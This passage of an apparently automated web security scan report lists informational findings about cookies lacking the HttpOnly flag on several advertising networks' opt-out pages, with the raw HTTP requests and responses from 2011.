X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=1yMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; domain=advertising.com; expires=Mon, 16-Sep-2013 16:37:09 GMT; path=/
Set-Cookie: GUID=MTMxNjI3NzQyOTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Mon, 16-Sep-2013 16:37:09 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 17:37:09 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
13.118. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.596117 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: xltl=eJxdkMFqwzAMht%252FF94AlW5LlntI2Y91C2ZK1223EcQylx7HDGHv3pYFechPi%252B%252FV%252FaIgSf7%252Bii%252BZ02JvNPGE0Fihk9hywWE4lqGCyOGoQUvJZF25O1I%252F3RC4DALBTH2ByOhb1pMKch2xpwnTjAKL5vuTPHq3vmqUMKBogZ9UDIIsC2jV5OO6WEo4muVmCMlVMBStvS6gGRa3GxJhCzuMw3dXabk5dIgiCFZLVzXr%252FceNQotnVTd%252B0D%252F27hevr08%252B53T6f3q7n7Dq%252FNqlfjstKo0F0loGRiFhl%252FpaI2fz9AwjiVPM%253D; BFF=eJzllk2PmzAQhv8Lv8AfgIFckjqqirTQaBOt0r1Ue%252Bx5j9v%252B99rYgQHmNermVOXqZ778wnjmrSl18%252FHeSNFkFynyfl%252FXtcp2vxpplNg5oJus%252B95fvj39%252BPnSnttLtntrapH0KeI5DUNtNQNeSRBZTkFeydHMVlPgjM9K5G1vfwvpaTHQsrqlmCgFagRLHzOSWKsk%252Ba9TrcE61npdJB1tNQUygMMXGqVypLwBcja31pTEO3fH8%252BzOU6kTpUCNYOljRkLtY5rLc59IEyiTxgGQxhEmTdu%252FJNIEyqRxAKRxhElzOF5jmpJJEyiTxoGljxnJIlDXHfdlLQqVE6CHc2ppyM3UXsrK5DW6uaIgn26%252B9ppHXZVBndewmpekK%252BnajP9WHC1n7kooKSjWk%252FOKGdKoSTEsEsOmxLAbYtiUGHZLDJsUw6bFsGtG%252B1v5365C%252Fa2YXzX2d8UIMTRrQt7AGYV8M0N5Y1Qor3eG8t5KgvIOqaG80R3J652RvEOvK%252FTgBIpfgoIRYvDRWN7AGYV8TChvjArl9c5Q3ltJUN4h9YrWTXY8PHX%252BojRqHo4Xhm3%252FlTN0x1y%252BU596f09gmjiA3t9Tvwj03LkruZFp6OfTwzkqCP8Gp2VHzAsqOM29D6s5Dar5WlZufz6zQn12X8JrEdyA%252FmndMcKA1SaS9GqDN5iNZQXvJBvrB94yNhYKvDfAFWFzI3jEwf948%252F2OMf540%252FqOofyfzV4waTfmKh6fcFJuDMZ75l9qzP0FWcbuBw%253D%253D; TFF=eJydlDtyxCAMhu%252ByJ5CEQYCbPUZaFy4yky7pdvbuwS8MNk4kFx6w5%252F%252Bs1w9D7Hx8fUek%252BEDonoTwDCHQox8ixddnxD49TJAW2Lbvkx4nvTnoqV9eS44zJiPSCt2FkrIS3frv8WP8Gn7G479xVbsDkauwzarxH%252F2x6llf15AzWzEpMUWihIChRmaO%252Faaftme9reMs%252BirOynHGZET6dprH1t19HulTmZPFVg0%252Be2ranvXHGvzJISvHGZMS2xyhOfd2ZoVeHIczps2MfNORwLveN%252FRHR876ajYrxxmTEnMk654AZorkr85YcX4XF3Q7h%252Bi5C7fIEAzTHdIFsNSJybrKu5y9yTkxZ4veGI%252Fp3hCjZkcJGjfxFciZkxFptU7Rh%252FkQQ%252BuuWLg%252F9Kp%252BF5y435wxVSRjdRXtetX52jjlKakjqrxecLre75zc6zXHmpktmNSvSa71ESr9irqeccZkxPsXb690Dg%253D%253D; EVX=eJyVkEEOwjAMBP%252FCC7xOHCfuY6wee%252BaI%252BndMSxFBhZabpVmvdz2a2m2y1poMo5XHTMPVUO2CotXVmbJTYhfHZZgML1ppowKnlfJGlREUUpwoeVlp6umyS9ho%252FqBJ3qns7OJJ56VAjQLcFdgNgR9nwgiomltY4cgqxKWRcD4pjoglpOn%252FiP2f%252BKBAqoDifCj9Iu2N5zs3DosS

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT; path=/; domain=.exelator.com
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=exelator.com
Content-type: text/html
Date: Sat, 17 Sep 2011 16:48:18 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2
Content-Length: 96

<img src="http://ad.yieldmanager.com/unpixel?id=199372&data=999999&" width="1" height="1"></img>
13.119. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=001&bi=CAESELFSW01kQJyVLBKUTkVd3R4&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2
Cookie: xltl=eJxdjjELAjEMRv9L94MkbdImTqKCgjgoztJeruAsTuJ%252F9zxwcfuG93hfNbbXw6KF62EbVvMiC4BcXJIU6iCtF83UgEYtmZWT68LNxnr%252FM7xXRJSoqeAUdeyaWLOIVweeqH05RAvPu98uBOm8W2LIFpAjaEIkyYoE%252F%252BThtFkiYqHF%252BQQ7D8KdhgS9DFVJh7EJteI%252B1ul37XierbthJoTMvHp%252FALJ%252BOtY%253D; BFF=eJzllb9OwzAQxt8lT%252BB%252FtR13aXEGIpEg0agqXVBHZkbg3XESNz4nPkeUja7%252B3d1nf8ndXYyQ5vPDUGKKjhLR7sqyZMX23VDFyNYBbormue0en17fjvWh7ortxUiRzdn4c1gGxvIEOIMiVIYiZ3AUxXIIXPCBEVG39ovQnm4GKvVVIlAI2ATmOWoi%252Fq4U6J%252FCXcdof9fTTHSK5RDQEewfYBXtiLwCcBZHc0j8m5vqEL05XDVQCNgE5jlqIjDey3QvbUZmpAkZBxAZRxIydXvMyIw0IeMAIuNIQmZfnbyMTMiMNCHjwDxHTWRWqGmqnSzJhgkA%252BHAOIxV4GdtRqpUosZczCER4%252BTIrrrq4BkxeQh1fiWvq2iz9rVJURumMMEog5iF5wRRo1KwZFjPD5sywK2bYnBl2zQybNcPmzbBLBvub9b%252BdxvqbJX5V3986YcTQrBl7R55wqG9m1F5fFbW3T0btvV4JtXeQRu316Zi9fXLMvm%252FZSLeuH3zLoAvlV9tDEYVsCk%252FymwJfCCuzHx%252FxK9McH9or8xkfw%252BjEXR2w9zhH729c%252FmEq%252Fr%252Fh9wMIK9ZV; TFF=eJydlDtyhDAMQO%252ByJ5Dkj2TTcIy0FBQ7ky7pMnv32CwY%252F8g4FIwNvIckJFi8Iv%252Fz5ZH8A0HPhDA75%252BgxLT7ceHqcwsEEYYFj%252B2p4jLyqeJrep7nHSRszwgr6gqREot2fvX6sn8v3Wj8bd1pVRqrCdKsO0J98XfXGlzWkzHZt1IiRKCigqJOZZTn4uG15U8Z580Wc3eOkjRnhWtUPK00%252F6pwM9mqQNFNx2%252FJ1DdJMyO5x0kaNo4%252FQ7Xs%252Fs4wfjsNJ%252B29mJN2JBD556fD1RG582RuRfCKlnshLY4tk7AygYiS5%252Bsay7xc3T58eorB2t0znFNMd0zowpIfNssq7nrnp2WHPZO9GCYb%252FxrCqTpWg8ye%252BEjl5Y0ZYjR0iX78BIaK%252F; EVX=eJyNjjsKwzAQBe%252FiE%252Bxbab86zOLSdcrgu0dOcCCQQt2DGZi3p%252BbzyIiQsWe7No1HwnODmpcVUy9qXFLYxpH4UqebCoo%252BlG9qjEkhWkSt9KLnO%252BMzg5%252FMfxVw67Eoa5BwX5TnCV090RwwLNnnC388VDQ%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:54:48 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:54:48 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NDOPN440MTOINDAzjzeINlaxrawFAVgzb; expires=Sun, 15-Jan-2012 16:54:49 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:54:49 GMT
Server: HTTP server

13.120. http://nai.btrll.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.8178339 HTTP/1.1
Host: nai.btrll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; DRN1=AGPX0VIEGKsAY9g6TutWQw

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:16:37 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/; domain=.btrll.com
Set-Cookie: BR_MBBV=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/
Set-Cookie: DRN1=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/; domain=.btrll.com
Set-Cookie: DRN1=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /nai/verify?nocache=0.8178339
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.121. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:20:02 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Fri, 17-Sep-2010 17:20:01 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 17:20:02 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
Content-Type: text/html

13.122. http://notrack.specificclick.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&cdn4=1 HTTP/1.1
Host: notrack.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ug=UKodabAN_aFXxA

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=1; expires=Sat, 17-Sep-2011 16:23:10 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=1; expires=Sat, 17-Sep-2011 16:23:10 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 17:23:10 GMT; path=/; domain=.specificclick.net
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificclick.net/CookieCheck.php?refreshCheck=1&optThis=1&result=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

13.123. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&result=optout_success HTTP/1.1
Host: notrack.specificmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 16:48:26 GMT; path=/; domain=.specificmedia.com
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificmedia.com/CookieCheck.php?refreshCheck=1&optThis=1&result=optout_success
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

13.124. http://oo.afy11.net/NAIOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIOptOut.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NAIOptOut.aspx?nocache=0.7283381 HTTP/1.1
Host: oo.afy11.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: a=9giczsQ9m0aIdZiyorEUmA; s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*H7smoJbdBO*OUqWXrs4_xHnkxwtG-oTwrC2_o7qgOoGZNiUPo3CfLWcqOE6*; c=AQECAAAAAAB7LmoESeFFTgAAAAAAAAAAAAAAAAAAAAA-4UVOAgACABGaCNXoAAAAZWNe1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1Cw8AAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPfLgCR4UVOAAAAAAAAAAAAAAAAAAAAAIbhRU4CAAIAee5p1egAAADJQWzV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL-FxtToAAAA1yXH1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; p=AQEBAAAAAAB7LmoESeFFTj-hRU4BAAAACQAAAAEAAAABAAAAAAAAAI6Y29ToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATAAAAAAAAABYAAAAAAAAAGwAAAAAAAAAcAAAAAAAAAICGRB3QAACQhIZEHdAAAJCGhkQd0AAAkLqGRB3QAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2p7vV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; f=AgEBAAAAAACLAZIHTuFFTg==

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /NAIConfirm.aspx
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
Set-Cookie: a=AAAAAAAAAAAAAAAAAAAAAA; domain=afy11.net; expires=Fri, 17-Sep-2021 00:00:00 GMT; path=/
Set-Cookie: f=; domain=afy11.net; expires=Fri, 17-Sep-2010 00:00:00 GMT; path=/
Set-Cookie: c=; domain=afy11.net; expires=Fri, 17-Sep-2010 00:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 17:15:03 GMT
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/NAIConfirm.aspx">here</a>.</h2>
</body></html>
13.125. http://open.ad.yieldmanager.net/a1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a1?V=5&pubId=21137265053&site=www.stamfordadvocate.com&cntTy=js&cTopId=20201001&tagTy=multi_secure&nAdP=6&rFrame=1&flv=10.3%20r183&cb=1316295932737&url=http%3A%2F%2Fwww.stamfordadvocate.com%2F&sz0=234x60&dlv0=ipatf&sltId0=0&sz1=300x250&dlv1=ipatf&sltId1=1&sz2=728x90&dlv2=ipatf&sltId2=2&sz3=88x31&dlv3=ipatf&sltId3=3&sz4=300x250&dlv4=ipbtf&sltId4=4&sz5=1x1&dlv5=ipatf&sltId5=5&ref=http%3A%2F%2Fwww.stamfordadvocate.com%2F&byt=%3Chead%3E%0A%09%09%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A43%3A53%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C!%5BCDATA%5B%0A%09%09%09%2F%2F%20document.domain%20%3D%20%22hearstnp.com%22%3B%0A%09%09%09var%20requestTime%20%3D%20new%20Date(1316277833%20*%201 HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=259&v=3&yoo=1&XTS=1316220782&XSIG=YpE90BW6SHTET2hMbIUWLF9ax8Y-; BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=259; S=s=ef4u1tl779ib7&t=1316276583

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=0mgdetd779jj4&t=1316277860;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 8522


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775704 loc=AP55 noad -->\u000a<img style=\"display:none\" width=0 height=0 alt=\
...[SNIP]...
13.126. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/?action=opt-out HTTP/1.1
Host: optout.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Tue, 01 Jan 1980 1:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
